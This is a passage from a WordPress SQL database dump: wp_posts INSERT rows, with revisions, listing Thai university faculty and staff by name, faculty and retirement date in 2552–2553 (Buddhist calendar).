(370, 1, '2019-05-26 15:21:56', '2019-05-26 08:21:56', 'ผู้ช่วยศาสตราจารย์ชูศักดิ์  แสงมุกดา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์ชูศักดิ์  แสงมุกดา', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%8a%e0%b8%b9%e0%b8%a8%e0%b8%b1', '', '', '2019-05-26 15:21:56', '2019-05-26 08:21:56', '', 0, 'http://172.17.40.11/wp511/?p=370', 0, 'post', '', 0),
(371, 1, '2019-05-26 15:21:56', '2019-05-26 08:21:56', 'ผู้ช่วยศาสตราจารย์ชูศักดิ์  แสงมุกดา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์ชูศักดิ์  แสงมุกดา', '', 'inherit', 'closed', 'closed', '', '370-revision-v1', '', '', '2019-05-26 15:21:56', '2019-05-26 08:21:56', '', 370, 'http://172.17.40.11/wp511/?p=371', 0, 'revision', '', 0),
(372, 1, '2019-05-26 15:22:21', '2019-05-26 08:22:21', 'ผู้ช่วยศาสตราจารย์ธันยา  สุคนธ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์ธันยา  สุคนธ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a2', '', '', '2019-05-26 15:22:21', '2019-05-26 08:22:21', '', 0, 'http://172.17.40.11/wp511/?p=372', 0, 'post', '', 0),
(373, 1, '2019-05-26 15:22:21', '2019-05-26 08:22:21', 'ผู้ช่วยศาสตราจารย์ธันยา  สุคนธ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์ธันยา  สุคนธ์', '', 'inherit', 'closed', 'closed', '', '372-revision-v1', '', '', '2019-05-26 15:22:21', '2019-05-26 08:22:21', '', 372, 'http://172.17.40.11/wp511/?p=373', 0, 'revision', '', 0),
(374, 1, '2019-05-26 15:22:34', '2019-05-26 08:22:34', 'อาจารย์นงนุช  แอ๊วสกุลทอง\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์นงนุช  แอ๊วสกุลทอง', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%87%e0%b8%99%e0%b8%b8%e0%b8%8a-%e0%b9%81%e0%b8%ad%e0%b9%8a%e0%b8%a7%e0%b8%aa%e0%b8%81%e0%b8%b8%e0%b8%a5%e0%b8%97', '', '', '2019-05-26 15:22:34', '2019-05-26 08:22:34', '', 0, 'http://172.17.40.11/wp511/?p=374', 0, 'post', '', 0),
(375, 1, '2019-05-26 15:22:34', '2019-05-26 08:22:34', 'อาจารย์นงนุช  แอ๊วสกุลทอง\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์นงนุช  แอ๊วสกุลทอง', '', 'inherit', 'closed', 'closed', '', '374-revision-v1', '', '', '2019-05-26 15:22:34', '2019-05-26 08:22:34', '', 374, 'http://172.17.40.11/wp511/?p=375', 0, 'revision', '', 0),
(376, 1, '2019-05-26 15:22:48', '2019-05-26 08:22:48', 'ผู้ช่วยศาสตราจารย์นิตยา  ธัญญพาณิชย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์นิตยา  ธัญญพาณิชย์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%b4%e0%b8%95%e0%b8%a2', '', '', '2019-05-26 15:22:48', '2019-05-26 08:22:48', '', 0, 'http://172.17.40.11/wp511/?p=376', 0, 'post', '', 0),
(377, 1, '2019-05-26 15:22:48', '2019-05-26 08:22:48', 'ผู้ช่วยศาสตราจารย์นิตยา  ธัญญพาณิชย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์นิตยา  ธัญญพาณิชย์', '', 'inherit', 'closed', 'closed', '', '376-revision-v1', '', '', '2019-05-26 15:22:48', '2019-05-26 08:22:48', '', 376, 'http://172.17.40.11/wp511/?p=377', 0, 'revision', '', 0),
(378, 1, '2019-05-26 15:23:01', '2019-05-26 08:23:01', 'อาจารย์ปราณีต  ชาตะรัตน์\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์ปราณีต  ชาตะรัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b2%e0%b8%93%e0%b8%b5%e0%b8%95-%e0%b8%8a%e0%b8%b2%e0%b8%95%e0%b8%b0%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%99', '', '', '2019-05-26 15:23:01', '2019-05-26 08:23:01', '', 0, 'http://172.17.40.11/wp511/?p=378', 0, 'post', '', 0),
(379, 1, '2019-05-26 15:23:01', '2019-05-26 08:23:01', 'อาจารย์ปราณีต  ชาตะรัตน์\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์ปราณีต  ชาตะรัตน์', '', 'inherit', 'closed', 'closed', '', '378-revision-v1', '', '', '2019-05-26 15:23:01', '2019-05-26 08:23:01', '', 378, 'http://172.17.40.11/wp511/?p=379', 0, 'revision', '', 0),
(380, 1, '2019-05-26 15:23:14', '2019-05-26 08:23:14', 'ผู้ช่วยศาสตราจารย์พรรณี  ไชยโย\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์พรรณี  ไชยโย', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9e%e0%b8%a3%e0%b8%a3%e0%b8%93', '', '', '2019-05-26 15:23:14', '2019-05-26 08:23:14', '', 0, 'http://172.17.40.11/wp511/?p=380', 0, 'post', '', 0),
(381, 1, '2019-05-26 15:23:14', '2019-05-26 08:23:14', 'ผู้ช่วยศาสตราจารย์พรรณี  ไชยโย\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์พรรณี  ไชยโย', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2019-05-26 15:23:14', '2019-05-26 08:23:14', '', 380, 'http://172.17.40.11/wp511/?p=381', 0, 'revision', '', 0),
(382, 1, '2019-05-26 15:23:28', '2019-05-26 08:23:28', 'ผู้ช่วยศาสตราจารย์ ดร.พวงเล็ก  วรกุล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์ ดร.พวงเล็ก  วรกุล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b8%9e%e0%b8%a7', '', '', '2019-05-26 15:23:28', '2019-05-26 08:23:28', '', 0, 'http://172.17.40.11/wp511/?p=382', 0, 'post', '', 0),
(383, 1, '2019-05-26 15:23:28', '2019-05-26 08:23:28', 'ผู้ช่วยศาสตราจารย์ ดร.พวงเล็ก  วรกุล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์ ดร.พวงเล็ก  วรกุล', '', 'inherit', 'closed', 'closed', '', '382-revision-v1', '', '', '2019-05-26 15:23:28', '2019-05-26 08:23:28', '', 382, 'http://172.17.40.11/wp511/?p=383', 0, 'revision', '', 0),
(384, 1, '2019-05-26 15:23:40', '2019-05-26 08:23:40', 'ผู้ช่วยศาสตราจารย์พวงแข  พงษ์ศิริบัญญัติ\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์พวงแข  พงษ์ศิริบัญญัติ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9e%e0%b8%a7%e0%b8%87%e0%b9%81', '', '', '2019-05-26 15:23:40', '2019-05-26 08:23:40', '', 0, 'http://172.17.40.11/wp511/?p=384', 0, 'post', '', 0),
(385, 1, '2019-05-26 15:23:40', '2019-05-26 08:23:40', 'ผู้ช่วยศาสตราจารย์พวงแข  พงษ์ศิริบัญญัติ\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์พวงแข  พงษ์ศิริบัญญัติ', '', 'inherit', 'closed', 'closed', '', '384-revision-v1', '', '', '2019-05-26 15:23:40', '2019-05-26 08:23:40', '', 384, 'http://172.17.40.11/wp511/?p=385', 0, 'revision', '', 0),
(386, 1, '2019-05-26 15:23:52', '2019-05-26 08:23:52', 'ผู้ช่วยศาสตราจารย์เพียงใจ  ผลโภค\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์เพียงใจ  ผลโภค', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%9e%e0%b8%b5%e0%b8%a2-2', '', '', '2019-05-26 15:23:52', '2019-05-26 08:23:52', '', 0, 'http://172.17.40.11/wp511/?p=386', 0, 'post', '', 0),
(387, 1, '2019-05-26 15:23:52', '2019-05-26 08:23:52', 'ผู้ช่วยศาสตราจารย์เพียงใจ  ผลโภค\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์เพียงใจ  ผลโภค', '', 'inherit', 'closed', 'closed', '', '386-revision-v1', '', '', '2019-05-26 15:23:52', '2019-05-26 08:23:52', '', 386, 'http://172.17.40.11/wp511/?p=387', 0, 'revision', '', 0),
(388, 1, '2019-05-26 15:24:05', '2019-05-26 08:24:05', 'รองศาสตราจารย์มานี  เตื้อสกุล\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'รองศาสตราจารย์มานี  เตื้อสกุล', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a1%e0%b8%b2%e0%b8%99%e0%b8%b5-%e0%b9%80%e0%b8%95%e0%b8%b7', '', '', '2019-05-26 15:24:05', '2019-05-26 08:24:05', '', 0, 'http://172.17.40.11/wp511/?p=388', 0, 'post', '', 0),
(389, 1, '2019-05-26 15:24:05', '2019-05-26 08:24:05', 'รองศาสตราจารย์มานี  เตื้อสกุล\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'รองศาสตราจารย์มานี  เตื้อสกุล', '', 'inherit', 'closed', 'closed', '', '388-revision-v1', '', '', '2019-05-26 15:24:05', '2019-05-26 08:24:05', '', 388, 'http://172.17.40.11/wp511/?p=389', 0, 'revision', '', 0),
(390, 1, '2019-05-26 15:24:18', '2019-05-26 08:24:18', 'อาจารย์รจนา  ศรีใส\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์รจนา  ศรีใส', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a3%e0%b8%88%e0%b8%99%e0%b8%b2-%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b9%83%e0%b8%aa', '', '', '2019-05-26 15:24:18', '2019-05-26 08:24:18', '', 0, 'http://172.17.40.11/wp511/?p=390', 0, 'post', '', 0),
(391, 1, '2019-05-26 15:24:18', '2019-05-26 08:24:18', 'อาจารย์รจนา  ศรีใส\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์รจนา  ศรีใส', '', 'inherit', 'closed', 'closed', '', '390-revision-v1', '', '', '2019-05-26 15:24:18', '2019-05-26 08:24:18', '', 390, 'http://172.17.40.11/wp511/?p=391', 0, 'revision', '', 0),
(392, 1, '2019-05-27 07:46:55', '2019-05-27 00:46:55', 'ผู้ช่วยศาสตราจารย์สมัย  วิถีรุ่งโรจน์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์สมัย  วิถีรุ่งโรจน์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%a2', '', '', '2019-05-27 07:46:55', '2019-05-27 00:46:55', '', 0, 'http://172.17.40.11/wp511/?p=392', 0, 'post', '', 0),
(393, 1, '2019-05-27 07:46:55', '2019-05-27 00:46:55', 'ผู้ช่วยศาสตราจารย์สมัย  วิถีรุ่งโรจน์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์สมัย  วิถีรุ่งโรจน์', '', 'inherit', 'closed', 'closed', '', '392-revision-v1', '', '', '2019-05-27 07:46:55', '2019-05-27 00:46:55', '', 392, 'http://172.17.40.11/wp511/?p=393', 0, 'revision', '', 0),
(394, 1, '2019-05-27 07:47:09', '2019-05-27 00:47:09', 'ผู้ช่วยศาสตราจารย์สัญญา  ศรีสุวรรณ\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์สัญญา  ศรีสุวรรณ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b1%e0%b8%8d%e0%b8%8d', '', '', '2019-05-27 07:47:09', '2019-05-27 00:47:09', '', 0, 'http://172.17.40.11/wp511/?p=394', 0, 'post', '', 0),
(395, 1, '2019-05-27 07:47:09', '2019-05-27 00:47:09', 'ผู้ช่วยศาสตราจารย์สัญญา  ศรีสุวรรณ\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์สัญญา  ศรีสุวรรณ', '', 'inherit', 'closed', 'closed', '', '394-revision-v1', '', '', '2019-05-27 07:47:09', '2019-05-27 00:47:09', '', 394, 'http://172.17.40.11/wp511/?p=395', 0, 'revision', '', 0),
(396, 1, '2019-05-27 07:47:22', '2019-05-27 00:47:22', 'ผู้ช่วยศาสตราจารย์สาคร  บุญเลิศ\r\n\r\nสังกัด  คณะมนุษยศาสตรืและสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์สาคร  บุญเลิศ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b2%e0%b8%84%e0%b8%a3', '', '', '2019-05-27 07:47:22', '2019-05-27 00:47:22', '', 0, 'http://172.17.40.11/wp511/?p=396', 0, 'post', '', 0),
(397, 1, '2019-05-27 07:47:22', '2019-05-27 00:47:22', 'ผู้ช่วยศาสตราจารย์สาคร  บุญเลิศ\r\n\r\nสังกัด  คณะมนุษยศาสตรืและสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์สาคร  บุญเลิศ', '', 'inherit', 'closed', 'closed', '', '396-revision-v1', '', '', '2019-05-27 07:47:22', '2019-05-27 00:47:22', '', 396, 'http://172.17.40.11/wp511/?p=397', 0, 'revision', '', 0),
(398, 1, '2019-05-27 07:47:34', '2019-05-27 00:47:34', 'อาจารย์ประเวศ  ก่อเกียรติศิริกุล\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์ประเวศ  ก่อเกียรติศิริกุล', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a7%e0%b8%a8-%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b8%a2%e0%b8%a3', '', '', '2019-05-27 07:47:34', '2019-05-27 00:47:34', '', 0, 'http://172.17.40.11/wp511/?p=398', 0, 'post', '', 0),
(399, 1, '2019-05-27 07:47:34', '2019-05-27 00:47:34', 'อาจารย์ประเวศ  ก่อเกียรติศิริกุล\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์ประเวศ  ก่อเกียรติศิริกุล', '', 'inherit', 'closed', 'closed', '', '398-revision-v1', '', '', '2019-05-27 07:47:34', '2019-05-27 00:47:34', '', 398, 'http://172.17.40.11/wp511/?p=399', 0, 'revision', '', 0),
(400, 1, '2019-05-27 07:47:48', '2019-05-27 00:47:48', 'ผู้ช่วยศาสตราจารย์รัตนา  ก่อเกียรติศิริกุล\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์รัตนา  ก่อเกียรติศิริกุล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%99', '', '', '2019-05-27 07:47:48', '2019-05-27 00:47:48', '', 0, 'http://172.17.40.11/wp511/?p=400', 0, 'post', '', 0),
(401, 1, '2019-05-27 07:47:48', '2019-05-27 00:47:48', 'ผู้ช่วยศาสตราจารย์รัตนา  ก่อเกียรติศิริกุล\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'ผู้ช่วยศาสตราจารย์รัตนา  ก่อเกียรติศิริกุล', '', 'inherit', 'closed', 'closed', '', '400-revision-v1', '', '', '2019-05-27 07:47:48', '2019-05-27 00:47:48', '', 400, 'http://172.17.40.11/wp511/?p=401', 0, 'revision', '', 0),
(402, 1, '2019-05-27 07:48:02', '2019-05-27 00:48:02', 'นายอาวุธ  ฤทธิภักดี\r\n\r\nสังกัด  ข้าราชการสังกัดสำนักงานคณะกรรมการการอุดมศึกษา  ปฏิบัติราชการที่มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nตำแหน่งเจ้าหน้าที่บริหารงานทั่วไป ระดับ 8\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'นายอาวุธ  ฤทธิภักดี', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%b2%e0%b8%a7%e0%b8%b8%e0%b8%98-%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b8%a0%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b5', '', '', '2019-05-27 07:48:02', '2019-05-27 00:48:02', '', 0, 'http://172.17.40.11/wp511/?p=402', 0, 'post', '', 0),
(403, 1, '2019-05-27 07:48:02', '2019-05-27 00:48:02', 'นายอาวุธ  ฤทธิภักดี\r\n\r\nสังกัด  ข้าราชการสังกัดสำนักงานคณะกรรมการการอุดมศึกษา  ปฏิบัติราชการที่มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nตำแหน่งเจ้าหน้าที่บริหารงานทั่วไป ระดับ 8\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'นายอาวุธ  ฤทธิภักดี', '', 'inherit', 'closed', 'closed', '', '402-revision-v1', '', '', '2019-05-27 07:48:02', '2019-05-27 00:48:02', '', 402, 'http://172.17.40.11/wp511/?p=403', 0, 'revision', '', 0),
(404, 1, '2019-05-27 07:48:16', '2019-05-27 00:48:16', 'อาจารย์ทัศนีย์  ตันตาปกุล\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์ทัศนีย์  ตันตาปกุล', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%97%e0%b8%b1%e0%b8%a8%e0%b8%99%e0%b8%b5%e0%b8%a2%e0%b9%8c-%e0%b8%95%e0%b8%b1%e0%b8%99%e0%b8%95%e0%b8%b2%e0%b8%9b%e0%b8%81', '', '', '2019-05-27 07:48:16', '2019-05-27 00:48:16', '', 0, 'http://172.17.40.11/wp511/?p=404', 0, 'post', '', 0),
(405, 1, '2019-05-27 07:48:16', '2019-05-27 00:48:16', 'อาจารย์ทัศนีย์  ตันตาปกุล\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์ทัศนีย์  ตันตาปกุล', '', 'inherit', 'closed', 'closed', '', '404-revision-v1', '', '', '2019-05-27 07:48:16', '2019-05-27 00:48:16', '', 404, 'http://172.17.40.11/wp511/?p=405', 0, 'revision', '', 0),
(406, 1, '2019-05-27 07:48:30', '2019-05-27 00:48:30', 'อาจารย์ธงศักดิ์  หงษ์แพง\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์ธงศักดิ์  หงษ์แพง', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%98%e0%b8%87%e0%b8%a8%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b4%e0%b9%8c-%e0%b8%ab%e0%b8%87%e0%b8%a9%e0%b9%8c%e0%b9%81%e0%b8%9e', '', '', '2019-05-27 07:48:30', '2019-05-27 00:48:30', '', 0, 'http://172.17.40.11/wp511/?p=406', 0, 'post', '', 0),
(407, 1, '2019-05-27 07:48:30', '2019-05-27 00:48:30', 'อาจารย์ธงศักดิ์  หงษ์แพง\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์ธงศักดิ์  หงษ์แพง', '', 'inherit', 'closed', 'closed', '', '406-revision-v1', '', '', '2019-05-27 07:48:30', '2019-05-27 00:48:30', '', 406, 'http://172.17.40.11/wp511/?p=407', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(408, 1, '2019-05-27 07:48:42', '2019-05-27 00:48:42', 'อาจารย์นภาพร  โกยสมบูรณ์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์นภาพร  โกยสมบูรณ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%a3-%e0%b9%82%e0%b8%81%e0%b8%a2%e0%b8%aa%e0%b8%a1%e0%b8%9a%e0%b8%b9%e0%b8%a3%e0%b8%93', '', '', '2019-05-27 07:48:42', '2019-05-27 00:48:42', '', 0, 'http://172.17.40.11/wp511/?p=408', 0, 'post', '', 0),
(409, 1, '2019-05-27 07:48:42', '2019-05-27 00:48:42', 'อาจารย์นภาพร  โกยสมบูรณ์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2553', 'อาจารย์นภาพร  โกยสมบูรณ์', '', 'inherit', 'closed', 'closed', '', '408-revision-v1', '', '', '2019-05-27 07:48:42', '2019-05-27 00:48:42', '', 408, 'http://172.17.40.11/wp511/?p=409', 0, 'revision', '', 0),
